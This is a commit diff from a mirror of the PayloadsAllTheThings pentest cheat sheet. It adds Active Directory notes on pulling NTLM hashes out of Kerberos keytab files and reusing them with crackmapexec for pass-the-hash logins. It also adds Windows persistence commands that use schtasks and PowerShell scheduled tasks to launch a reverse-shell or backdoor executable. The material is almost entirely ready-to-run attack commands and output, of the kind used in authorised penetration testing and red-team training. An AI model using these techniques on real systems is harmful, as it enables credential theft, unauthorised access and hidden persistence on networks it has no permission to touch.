daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Keytab + schtasks

patch-1
Swissky 2020-10-15 12:35:05 +02:00
parent 2ab1c58dac
commit b32f4754d7
2 changed files with 25 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
Methodology and Resources/Active Directory Attack.md
View File

@ -1779,11 +1779,22 @@ $ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab
[26] Service principal: host/COMPUTER@DOMAIN [26] Service principal: host/COMPUTER@DOMAIN
KVNO: 25 KVNO: 25
Key type: 23 Key type: 23
Key: 6b3723410a3c54692e400a5862256e0a Key: 31d6cfe0d16ae931b73c59d7e0c089c0
Time stamp: Oct 07, 2019 09:12:02 Time stamp: Oct 07, 2019 09:12:02
[...] [...]
``` ```
On Linux you can use [`KeyTabExtract`](https://github.com/sosdave/KeyTabExtract): we want RC4 HMAC hash to reuse the NLTM hash.
```powershell
$ python3 keytabextract.py krb5.keytab
[!] No RC4-HMAC located. Unable to extract NTLM hashes. # No luck
[+] Keytab File successfully imported.
REALM : DOMAIN
SERVICE PRINCIPAL : host/computer.domain
NTLM HASH : 31d6cfe0d16ae931b73c59d7e0c089c0 # Lucky
```
On macOS you can use `bifrost`. On macOS you can use `bifrost`.
```powershell ```powershell
@ -1793,13 +1804,10 @@ On macOS you can use `bifrost`.
Connect to the machine using the account and the hash with CME. Connect to the machine using the account and the hash with CME.
```powershell ```powershell
$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b3723410a3c54692e400a5862256e0a" -d "DOMAIN" $ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN"
CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c54692e400a5862256e0a CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0
``` ```
## References ## References
* [Explain like Im 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) * [Explain like Im 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)

11
Methodology and Resources/Windows - Persistence.md
View File

@ -102,6 +102,17 @@ SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -
### Scheduled Tasks User ### Scheduled Tasks User
Using native **schtask**
```powershell
# Create the scheduled tasks to run once at 00.00
schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe
# Force run it now !
schtasks /run /tn "Device-Synchronize"
```
Using Powershell
```powershell ```powershell
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"